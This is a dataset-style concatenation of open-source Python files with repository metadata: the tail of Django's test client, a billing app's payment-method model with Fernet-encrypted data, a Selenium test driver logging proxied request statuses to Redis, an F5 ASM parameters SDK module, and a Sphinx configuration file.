'SERVER_NAME': str('testserver'),
'SERVER_PORT': str('80'),
'SERVER_PROTOCOL': str('HTTP/1.1'),
'wsgi.version': (1, 0),
'wsgi.url_scheme': str('http'),
'wsgi.input': FakePayload(b''),
'wsgi.errors': self.errors,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
}
environ.update(self.defaults)
environ.update(request)
return environ
def request(self, **request):
"Construct a generic request object."
return WSGIRequest(self._base_environ(**request))
def _encode_data(self, data, content_type):
if content_type is MULTIPART_CONTENT:
return encode_multipart(BOUNDARY, data)
else:
# Encode the content so that the byte representation is correct.
match = CONTENT_TYPE_RE.match(content_type)
if match:
charset = match.group(1)
else:
charset = settings.DEFAULT_CHARSET
return force_bytes(data, encoding=charset)
def _get_path(self, parsed):
path = force_str(parsed[2])
# If there are parameters, add them
if parsed[3]:
path += str(";") + force_str(parsed[3])
path = uri_to_iri(path).encode(UTF_8)
# Under Python 3, non-ASCII values in the WSGI environ are arbitrarily
# decoded with ISO-8859-1. We replicate this behavior here.
# Refs comment in `get_bytes_from_wsgi()`.
return path.decode(ISO_8859_1) if six.PY3 else path
def get(self, path, data=None, secure=False, **extra):
"Construct a GET request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('GET', path, secure=secure, **r)
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
secure=False, **extra):
"Construct a POST request."
data = {} if data is None else data
post_data = self._encode_data(data, content_type)
return self.generic('POST', path, post_data, content_type,
secure=secure, **extra)
def head(self, path, data=None, secure=False, **extra):
"Construct a HEAD request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('HEAD', path, secure=secure, **r)
def options(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct an OPTIONS request."
return self.generic('OPTIONS', path, data, content_type,
secure=secure, **extra)
def put(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PUT request."
return self.generic('PUT', path, data, content_type,
secure=secure, **extra)
def patch(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PATCH request."
return self.generic('PATCH', path, data, content_type,
secure=secure, **extra)
def delete(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a DELETE request."
return self.generic('DELETE', path, data, content_type,
secure=secure, **extra)
def generic(self, method, path, data='',
content_type='application/octet-stream', secure=False,
**extra):
"""Constructs an arbitrary HTTP request."""
parsed = urlparse(path)
data = force_bytes(data, settings.DEFAULT_CHARSET)
r = {
'PATH_INFO': self._get_path(parsed),
'REQUEST_METHOD': str(method),
'SERVER_PORT': str('443') if secure else str('80'),
'wsgi.url_scheme': str('https') if secure else str('http'),
}
if data:
r.update({
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': str(content_type),
'wsgi.input': FakePayload(data),
})
r.update(extra)
# If QUERY_STRING is absent or empty, we want to extract it from the URL.
if not r.get('QUERY_STRING'):
query_string = force_bytes(parsed[4])
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
query_string = query_string.decode('iso-8859-1')
r['QUERY_STRING'] = query_string
return self.request(**r)
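# Editorial usage sketch: a factory-built request can be handed straight to a
# view function; 'my_view' here is a hypothetical stand-in.
def _request_factory_example(my_view):
    rf = RequestFactory()
    request = rf.get('/hello/', {'q': 'test'}, secure=True)
    # secure=True flips SERVER_PORT to 443 and wsgi.url_scheme to 'https'.
    return my_view(request)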
class Client(RequestFactory):
"""
A class that can act as a client for testing purposes.
It allows the user to compose GET and POST requests, and
obtain the response that the server gave to those requests.
The server Response objects are annotated with the details
of the contexts and templates that were rendered during the
process of serving the request.
Client objects are stateful - they will retain cookie (and
thus session) details for the lifetime of the Client instance.
This is not intended as a replacement for Twill/Selenium or
the like - it is here to allow testing against the
contexts and templates produced by a view, rather than the
HTML rendered to the end-user.
"""
def __init__(self, enforce_csrf_checks=False, **defaults):
super(Client, self).__init__(**defaults)
self.handler = ClientHandler(enforce_csrf_checks)
self.exc_info = None
def store_exc_info(self, **kwargs):
"""
Stores exceptions when they are generated by a view.
"""
self.exc_info = sys.exc_info()
def _session(self):
"""
Obtains the current session variables.
"""
if apps.is_installed('django.contrib.sessions'):
engine = import_module(settings.SESSION_ENGINE)
cookie = self.cookies.get(settings.SESSION_COOKIE_NAME, None)
if cookie:
return engine.SessionStore(cookie.value)
else:
s = engine.SessionStore()
s.save()
self.cookies[settings.SESSION_COOKIE_NAME] = s.session_key
return s
return {}
session = property(_session)
def request(self, **request):
"""
The master request method. Composes the environment dictionary
and passes to the handler, returning the result of the handler.
Assumes defaults for the query environment, which can be overridden
using the arguments to the request.
"""
environ = self._base_environ(**request)
# Curry a data dictionary into an instance of the template renderer
# callback function.
data = {}
on_template_render = curry(store_rendered_templates, data)
signal_uid = "template-render-%s" % id(request)
signals.template_rendered.connect(on_template_render, dispatch_uid=signal_uid)
# Capture exceptions created by the handler.
got_request_exception.connect(self.store_exc_info, dispatch_uid="request-exception")
try:
try:
response = self.handler(environ)
except TemplateDoesNotExist as e:
# If the view raises an exception, Django will attempt to show
# the 500.html template. If that template is not available,
# we should ignore the error in favor of re-raising the
# underlying exception that caused the 500 error. Any other
# template found to be missing during view error handling
# should be reported as-is.
if e.args != ('500.html',):
raise
# Look for a signalled exception, clear the current context
# exception data, then re-raise the signalled exception.
# Also make sure that the signalled exception is cleared from
# the local cache!
if self.exc_info:
exc_info = self.exc_info
self.exc_info = None
six.reraise(*exc_info)
# Save the client and request that stimulated the response.
response.client = self
response.request = request
# Add any rendered template detail to the response.
response.templates = data.get("templates", [])
response.context = data.get("context")
# Attach the ResolverMatch instance to the response
response.resolver_match = SimpleLazyObject(
lambda: urlresolvers.resolve(request['PATH_INFO']))
# Flatten a single context. Not really necessary anymore thanks to
# the __getattr__ flattening in ContextList, but has some edge-case
# backwards-compatibility implications.
if response.context and len(response.context) == 1:
response.context = response.context[0]
# Update persistent cookie data.
if response.cookies:
self.cookies.update(response.cookies)
return response
finally:
signals.template_rendered.disconnect(dispatch_uid=signal_uid)
got_request_exception.disconnect(dispatch_uid="request-exception")
def get(self, path, data=None, follow=False, secure=False, **extra):
"""
Requests a response from the server using GET.
"""
response = super(Client, self).get(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
follow=False, secure=False, **extra):
"""
Requests a response from the server using POST.
"""
response = super(Client, self).post(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def head(self, path, data=None, follow=False, secure=False, **extra):
"""
Request a response from the server using HEAD.
"""
response = super(Client, self).head(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def options(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Request a response from the server using OPTIONS.
"""
response = super(Client, self).options(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def put(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PUT.
"""
response = super(Client, self).put(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def patch(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PATCH.
"""
response = super(Client, self).patch(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def delete(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a DELETE request to the server.
"""
response = super(Client, self).delete(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def login(self, **credentials):
"""
Sets the Factory to appear as if it has successfully logged into a site.
Returns True if login is possible; False if the provided credentials
are incorrect, or the user is inactive, or if the sessions framework is
not available.
"""
from django.contrib.auth import authenticate, login
user = authenticate(**credentials)
if (user and user.is_active and
apps.is_installed('django.contrib.sessions')):
engine = import_module(settings.SESSION_ENGINE)
# Create a fake request to store login details.
request = HttpRequest()
if self.session:
request.session = self.session
else:
request.session = engine.SessionStore()
login(request, user)
# Save the session values.
request.session.save()
# Set the cookie to represent the session.
session_cookie = settings.SESSION_COOKIE_NAME
self.cookies[session_cookie] = request.session.session_key
cookie_data = {
'max-age': None,
'path': '/',
'domain': settings.SESSION_COOKIE_DOMAIN,
'secure': settings.SESSION_COOKIE_SECURE or None,
'expires': None,
}
self.cookies[session_cookie].update(cookie_data)
return True
else:
return False
def logout(self):
"""
Removes the authenticated user's cookies and session object.
Causes the authenticated user to be logged out.
"""
from django.contrib.auth import get_user, logout
request = HttpRequest()
engine = import_module(settings.SESSION_ENGINE)
if self.session:
request.session = self.session
request.user = get_user(request)
else:
request.session = engine.SessionStore()
logout(request)
self.cookies = SimpleCookie()
def _handle_redirects(self, response, **extra):
"Follows any redirects by requesting responses from the server using GET."
response.redirect_chain = []
while response.status_code in (301, 302, 303, 307):
url = response.url
redirect_chain = response.redirect_chain
redirect_chain.append((url, response.status_code))
url = urlsplit(url)
if url.scheme:
extra['wsgi.url_scheme'] = url.scheme
if url.hostname:
extra['SERVER_NAME'] = url.hostname
if url.port:
extra['SERVER_PORT'] = str(url.port)
response = self.get(url.path, QueryDict(url.query), follow=False, **extra)
response.redirect_chain = redirect_chain
# Prevent loops
if response.redirect_chain[-1] in response.redirect_chain[0:-1]:
break
return response
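# Editorial usage sketch: the stateful test client keeps cookies between
# calls, so login() followed by get() behaves like one browser session.
# The URL and credentials below are hypothetical.
def _client_example():
    client = Client()
    if client.login(username='jane', password='secret'):
        response = client.get('/accounts/profile/', follow=True)
        # With follow=True each redirect hop is recorded as (url, status_code).
        return response.status_code, response.redirect_chain
    return None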
|
bsd-3-clause
| -1,923,242,841,704,961,000
| 37.451411
| 112
| 0.587111
| false
| 4.484826
| false
| false
| false
|
silverapp/silver
|
silver/models/payment_methods.py
|
1
|
8577
|
# Copyright (c) 2017 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
from typing import Union
from itertools import chain
from annoying.functions import get_object_or_None
from cryptography.fernet import InvalidToken, Fernet
from django.core.serializers.json import DjangoJSONEncoder
from django_fsm import TransitionNotAllowed
from model_utils.managers import InheritanceManager
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from django.utils import timezone
from silver import payment_processors
from silver.models import Invoice, Proforma
from silver.models.billing_entities import Customer
from silver.models.transactions import Transaction
class PaymentMethodInvalid(Exception):
pass
class PaymentMethod(models.Model):
class PaymentProcessors:
@classmethod
def as_choices(cls):
for name in settings.PAYMENT_PROCESSORS.keys():
yield (name, name)
@classmethod
def as_list(cls):
return [name for name in settings.PAYMENT_PROCESSORS.keys()]
payment_processor = models.CharField(choices=PaymentProcessors.as_choices(),
blank=False, null=False, max_length=256)
customer = models.ForeignKey(Customer, models.CASCADE)
added_at = models.DateTimeField(default=timezone.now)
data = models.JSONField(blank=True, null=True, default=dict, encoder=DjangoJSONEncoder)
verified = models.BooleanField(default=False)
canceled = models.BooleanField(default=False)
valid_until = models.DateTimeField(null=True, blank=True)
display_info = models.CharField(max_length=256, null=True, blank=True)
objects = InheritanceManager()
class Meta:
ordering = ['-id']
@property
def final_fields(self):
return ['payment_processor', 'customer', 'added_at']
@property
def irreversible_fields(self):
return ['verified', 'canceled']
def __init__(self, *args, **kwargs):
super(PaymentMethod, self).__init__(*args, **kwargs)
if self.id:
try:
payment_method_class = self.get_payment_processor().payment_method_class
if payment_method_class:
self.__class__ = payment_method_class
except AttributeError:
pass
@property
def transactions(self):
return self.transaction_set.all()
def get_payment_processor(self):
return payment_processors.get_instance(self.payment_processor)
def delete(self, using=None):
if not self.state == self.States.Uninitialized:
self.remove()
super(PaymentMethod, self).delete(using=using)
def encrypt_data(self, data: Union[str, bytes]) -> str:
if isinstance(data, str):
data = data.encode(encoding="utf-8")
key = settings.PAYMENT_METHOD_SECRET
return Fernet(key).encrypt(data).decode('utf-8')
def decrypt_data(self, crypted_data: Union[str, bytes]) -> str:
if not crypted_data:
return ""
if isinstance(crypted_data, str):
crypted_data = crypted_data.encode(encoding="utf-8")
key = settings.PAYMENT_METHOD_SECRET
return Fernet(key).decrypt(crypted_data).decode("utf-8")
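    # Editorial usage sketch (assumes settings.PAYMENT_METHOD_SECRET holds a
    # valid Fernet key, e.g. one produced by Fernet.generate_key()):
    #   token = payment_method.encrypt_data('card-reference')
    #   assert payment_method.decrypt_data(token) == 'card-reference'
    # A tampered token makes Fernet raise the InvalidToken imported above.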
def cancel(self):
if self.canceled:
raise ValidationError("You can't cancel a canceled payment method.")
cancelable_states = [Transaction.States.Initial,
Transaction.States.Pending]
transactions = self.transactions.filter(state__in=cancelable_states)
errors = []
for transaction in transactions:
if transaction.state == Transaction.States.Initial:
try:
transaction.cancel()
except TransitionNotAllowed:
errors.append("Transaction {} couldn't be canceled".format(transaction.uuid))
if transaction.state == Transaction.States.Pending:
payment_processor = self.get_payment_processor()
if (hasattr(payment_processor, 'void_transaction') and
not payment_processor.void_transaction(transaction)):
errors.append("Transaction {} couldn't be voided".format(transaction.uuid))
transaction.save()
if errors:
return errors
self.canceled = True
self.save()
return None
def clean_with_previous_instance(self, previous_instance):
if not previous_instance:
return
for field in self.final_fields:
old_value = getattr(previous_instance, field, None)
current_value = getattr(self, field, None)
if old_value != current_value:
raise ValidationError(
"Field '%s' may not be changed." % field
)
for field in self.irreversible_fields:
old_value = getattr(previous_instance, field, None)
current_value = getattr(self, field, None)
if old_value and old_value != current_value:
raise ValidationError(
"Field '%s' may not be changed anymore." % field
)
def full_clean(self, *args, **kwargs):
previous_instance = kwargs.pop('previous_instance', None)
super(PaymentMethod, self).full_clean(*args, **kwargs)
self.clean_with_previous_instance(previous_instance)
# this assumes that nobody calls clean and then modifies this object
# without calling clean again
setattr(self, '.cleaned', True)
@property
def allowed_currencies(self):
return self.get_payment_processor().allowed_currencies
@property
def public_data(self):
return {}
def __str__(self):
return u'{} - {} - {}'.format(self.customer,
self.get_payment_processor_display(),
self.pk)
def create_transactions_for_issued_documents(payment_method):
customer = payment_method.customer
if payment_method.canceled or not payment_method.verified:
return []
transactions = []
for document in chain(
Proforma.objects.filter(related_document=None, customer=customer,
state=Proforma.STATES.ISSUED),
Invoice.objects.filter(state=Invoice.STATES.ISSUED, customer=customer)
):
try:
transactions.append(Transaction.objects.create(
document=document, payment_method=payment_method
))
except ValidationError:
continue
return transactions
@receiver(pre_save)
def pre_payment_method_save(sender, instance=None, **kwargs):
if not isinstance(instance, PaymentMethod):
return
payment_method = instance
previous_instance = get_object_or_None(PaymentMethod, pk=payment_method.pk)
setattr(payment_method, '.previous_instance', previous_instance)
if not getattr(payment_method, '.cleaned', False):
payment_method.full_clean(previous_instance=previous_instance)
@receiver(post_save)
def post_payment_method_save(sender, instance, **kwargs):
if not isinstance(instance, PaymentMethod):
return
payment_method = instance
if hasattr(payment_method, '.cleaned'):
delattr(payment_method, '.cleaned')
previous_instance = getattr(payment_method, '.previous_instance', None)
if not (settings.SILVER_AUTOMATICALLY_CREATE_TRANSACTIONS or
not payment_method.verified or
(not payment_method.get_payment_processor().type ==
payment_processors.Types.Triggered)):
return
if not previous_instance or not previous_instance.verified:
create_transactions_for_issued_documents(payment_method)
|
apache-2.0
| -5,897,001,218,787,682,000
| 32.244186
| 97
| 0.647779
| false
| 4.393955
| false
| false
| false
|
Goldcap/django-selenium-testing
|
ppfa/selenium_tests/webdriver.py
|
1
|
8427
|
import os
import json
import redis
import shutil
import datetime
from ws4redis.redis_store import RedisMessage
from ws4redis.publisher import RedisPublisher
from pyvirtualdisplay import Display
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, NoAlertPresentException
from django.test import TestCase
from django.conf import settings
from selenium_tests.models import PpfaTestAssertion
class PpfaWebDriver(TestCase):
browser = None
profile = None
logger = None
testObject = None
runObject = None
errors = []
publisher = None
profile_path = None
redis_key = "proxy_request"
redis_session = 1
REDIS_HOST = '127.0.0.1'
REDIS_PORT = 6379
assert_failed_requests = True
def __init__(self, *args, **kw):
self.r = redis.StrictRedis(host=self.REDIS_HOST, port=self.REDIS_PORT, db=0)
session = self.r.get("proxy_request")
if session:
self.redis_session = session
#print self.redis_session
super(PpfaWebDriver, self).__init__(*args, **kw)
def set_up(self):
self.clearSession(200)
self.clearSession(404)
self.clearSession(500)
self.publisher = RedisPublisher(facility='foobar', broadcast=True)
self.broadcast("Starting Test '"+self.runObject.ppfa_test.name+"'")
self.startup()
def count_requests(self):
requests_200 = self.getSession(200)
self.broadcast("Total Requests (200): %s" % len(requests_200))
requests_404 = self.getSession(404)
self.broadcast("Total Requests (404): %s" % len(requests_404))
if len(requests_404) > 0 and self.assert_failed_requests:
self.failassertion( "Assets Missing", "from", "pageload" )
for failure in requests_404:
print failure
self.broadcast(failure)
requests_500 = self.getSession(500)
self.broadcast("Total Requests (500): %s" % len(requests_500))
if len(requests_500) > 0 and self.assert_failed_requests:
self.failassertion( "Assets Broken", "from", "pageload" )
for failure in requests_500:
print failure
self.broadcast(failure)
def tear_down(self):
self.count_requests()
if self.shut_down():
return self.runObject
def startup(self):
self.broadcast("Starting Xvfb Display")
display = Display(visible=0, size=(1024, 768))
display.start()
self.broadcast("Starting Firefox Browser")
self.profile = webdriver.FirefoxProfile()
# Direct = 0, Manual = 1, PAC = 2, AUTODETECT = 4, SYSTEM = 5
self.profile.set_preference("network.proxy.type", 1)
self.profile.set_preference("network.proxy.http",settings.PROXY_HOST)
self.profile.set_preference("network.proxy.http_port",int(settings.PROXY_PORT))
self.profile.set_preference("network.proxy.ssl",settings.PROXY_HOST)
self.profile.set_preference("network.proxy.ssl_port",int(settings.PROXY_PORT))
self.profile.set_preference("general.useragent.override","ppfa_test_runner")
self.profile.update_preferences()
self.profile_path = os.path.join('tmp',self.profile.profile_dir)
#print "Destination is in %s" % self.profile_path
source = os.path.join(os.path.dirname(__file__),'cert8.db')
#print "Source is in %s" % source
shutil.copy2(source, self.profile_path)
self.browser = webdriver.Firefox(self.profile)
def setSession( self, id ):
self.redis_session = id
self.r.set(self.redis_key,self.redis_session)
def clearSession( self, status ):
self.r.zremrangebyrank(self.redis_key+"::"+str(status)+"::"+str(self.redis_session),0,-1)
def getSession( self, status ):
print "Looking for %s" % (self.redis_key+"::"+str(status)+"::"+str(self.redis_session))
results = self.r.zrange(self.redis_key+"::"+str(status)+"::"+str(self.redis_session),0,-1)
return results
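    # Hedged illustration of the key scheme above (hypothetical values):
    # with redis_key "proxy_request", status 404 and session id 7, both
    # clearSession() and getSession() operate on the sorted set named
    # "proxy_request::404::7".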
def page_source(self):
time = datetime.datetime.now().strftime("%I%M%p_%B_%d_%Y")
path = "screens/"+str(self.runObject.id)
if not os.path.exists(path):
os.mkdir(path)
filename = self.redis_key+"_"+str(self.redis_session)+"_"+str(time)+".html"
with open(os.path.join(path, filename), 'wb') as temp_file:
temp_file.write(self.browser.page_source.encode('ascii','replace'))
def screencap(self):
time = datetime.datetime.now().strftime("%I%M%p_%B_%d_%Y")
path = "screens/"+str(self.runObject.id)
if not os.path.exists(path):
os.mkdir(path)
filename = self.redis_key+"_"+str(self.redis_session)+"_"+str(time)+".png"
print filename
self.browser.save_screenshot(os.path.join(path, filename))
def broadcast( self, message ):
print message
if self.publisher:
message = {"message":message}
self.publisher.publish_message(RedisMessage(json.dumps(message)))
def runassertion( self, subject, verb, object ):
assertion = PpfaTestAssertion.objects.create(
ppfa_test=self.testObject,
ppfa_test_run=self.runObject,
subject=subject,
verb=verb,
object=object,
)
result = assertion.run_assertion(self.browser)
status_type = 'success'
if not result:
self.errors.append(assertion.id)
status_type = 'error'
self.logger.log("'%s' %s %s:: %s",[subject, verb, object, assertion.status_string],status_type)
self.broadcast("'%s' %s %s:: %s" % (subject, verb, object, assertion.status_string,))
return result
def passassertion( self, subject, verb, object ):
assertion = PpfaTestAssertion.objects.create(
ppfa_test=self.testObject,
ppfa_test_run=self.runObject,
subject=subject,
verb=verb,
object=object,
status=True
)
status_type = 'success'
self.logger.log("'%s' %s %s:: %s",[subject, verb, object, assertion.status_string],status_type)
self.broadcast("'%s' %s %s:: %s" % (subject, verb, object, assertion.status_string,))
return False
def failassertion( self, subject, verb, object ):
assertion = PpfaTestAssertion.objects.create(
ppfa_test=self.testObject,
ppfa_test_run=self.runObject,
subject=subject,
verb=verb,
object=object,
status=False
)
self.errors.append(assertion.id)
status_type = 'error'
self.logger.log("'%s' %s %s:: %s",[subject, verb, object, assertion.status_string],'error')
self.broadcast("'%s' %s %s:: %s" % (subject, verb, object, assertion.status_string,))
return False
def is_element_present(self, how, what):
try: self.browser.find_element(by=how, value=what)
except NoSuchElementException, e: return False
return True
def is_alert_present(self):
try: self.browser.switch_to_alert()
except NoAlertPresentException, e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.browser.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def shut_down(self):
self.broadcast("Done Testing")
self.browser.quit()
for root, dirs, files in os.walk(self.profile_path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
return True
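# --- Hedged usage sketch (not part of the original module) ------------------
# Illustrates how a concrete test might drive PpfaWebDriver; the URL and the
# assertion triple are hypothetical, the test/run objects are assumed to be
# wired up elsewhere, and nothing here runs at import time.
def _example_smoke_test():
    class ExampleSmokeTest(PpfaWebDriver):
        def run_checks(self):
            self.set_up()                            # Xvfb + proxied Firefox
            self.browser.get("http://example.com/")  # hypothetical target
            self.runassertion("Example Domain", "in", "title")
            self.screencap()
            return self.tear_down()
    return ExampleSmokeTest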
|
mit
| 5,567,993,571,545,259,000
| 36.959459
| 103
| 0.568055
| false
| 4.003325
| true
| false
| false
|
F5Networks/f5-common-python
|
f5/bigip/tm/asm/policies/parameters.py
|
1
|
4409
|
# coding=utf-8
#
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import LooseVersion
from f5.bigip.resource import AsmResource
from f5.bigip.resource import Collection
class UrlParametersCollection(Collection):
"""BIG-IP® ASM Urls Parameters sub-collection."""
def __init__(self, urls_s):
self.__class__.__name__ = 'Parameters_s'
super(UrlParametersCollection, self).__init__(urls_s)
self._meta_data['object_has_stats'] = False
self._meta_data['allowed_lazy_attributes'] = [Parameter]
self._meta_data['required_json_kind'] = 'tm:asm:policies:urls:parameters:parametercollectionstate'
self._meta_data['attribute_registry'] = {
'tm:asm:policies:urls:parameters:parameterstate': Parameter
}
class ParametersCollection(Collection):
"""BIG-IP® ASM Policies Parameters sub-collection."""
def __init__(self, policy):
self.__class__.__name__ = 'Parameters_s'
super(ParametersCollection, self).__init__(policy)
self._meta_data['object_has_stats'] = False
self._meta_data['allowed_lazy_attributes'] = [Parameter]
self._meta_data['required_json_kind'] = 'tm:asm:policies:parameters:parametercollectionstate'
self._meta_data['attribute_registry'] = {
'tm:asm:policies:parameters:parameterstate': Parameter
}
class Parameters_s(object):
"""As Parameters classes are used twice as a sub-collection.
We need to utilize __new__ method in order to keep the user
interface consistent.
"""
def __new__(cls, container):
from f5.bigip.tm.asm.policies import Policy
from f5.bigip.tm.asm.policies.urls import Url
if isinstance(container, Policy):
return ParametersCollection(container)
if isinstance(container, Url):
return UrlParametersCollection(container)
class Parameter(object):
"""As Parameter classes are used twice as a sub-collection.
We need to utilize __new__ method in order to keep the user
interface consistent.
"""
def __new__(cls, container):
if isinstance(container, ParametersCollection):
return ParametersResource(container)
if isinstance(container, UrlParametersCollection):
return UrlParametersResource(container)
class UrlParametersResource(AsmResource):
"""BIG-IP® ASM Urls Parameters resource."""
def __init__(self, urls_s):
self.__class__.__name__ = 'Parameter'
super(UrlParametersResource, self).__init__(urls_s)
self.tmos_v = urls_s._meta_data['bigip']._meta_data['tmos_version']
self._meta_data['required_json_kind'] = 'tm:asm:policies:urls:parameters:parameterstate'
def create(self, **kwargs):
"""Custom create method for v12.x and above.
Change of behavior in v12 where the returned selfLink is different
from target resource, requires us to append URI after object is
created. So any modify() calls will not lead to json kind
inconsistency when changing the resource attribute.
See issue #844
"""
if LooseVersion(self.tmos_v) < LooseVersion('12.0.0'):
return self._create(**kwargs)
else:
new_instance = self._create(**kwargs)
tmp_name = str(new_instance.id)
tmp_path = new_instance._meta_data['container']._meta_data['uri']
finalurl = tmp_path + tmp_name
new_instance._meta_data['uri'] = finalurl
return new_instance
class ParametersResource(AsmResource):
"""BIG-IP® ASM Urls Parameters resource."""
def __init__(self, policy):
self.__class__.__name__ = 'Parameter'
super(ParametersResource, self).__init__(policy)
self._meta_data['required_json_kind'] = 'tm:asm:policies:parameters:parameterstate'
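# --- Hedged usage sketch (not part of the original module) ------------------
# Shows the __new__ dispatch above: the same Parameters_s name resolves to a
# policy-level or URL-level sub-collection depending on its container. 'mgmt'
# is a hypothetical f5.bigip.ManagementRoot connection and the policy id is
# illustrative only.
def _example_dispatch(mgmt):
    policy = mgmt.tm.asm.policies_s.policy.load(id='hypothetical-id')
    params = Parameters_s(policy)      # -> ParametersCollection
    assert isinstance(params, ParametersCollection)
    return params.get_collection()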
|
apache-2.0
| -8,019,605,598,075,704,000
| 37.304348
| 106
| 0.664018
| false
| 4.120674
| false
| false
| false
|
ivbeg/lazyscraper
|
docs/conf.py
|
1
|
8502
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lazyscraper documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this conf.py.
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import lazyscraper
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lazyscraper'
copyright = u'2018, Ivan Begtin'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = lazyscraper.__version__
# The full version, including alpha/beta/rc tags.
release = lazyscraper.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
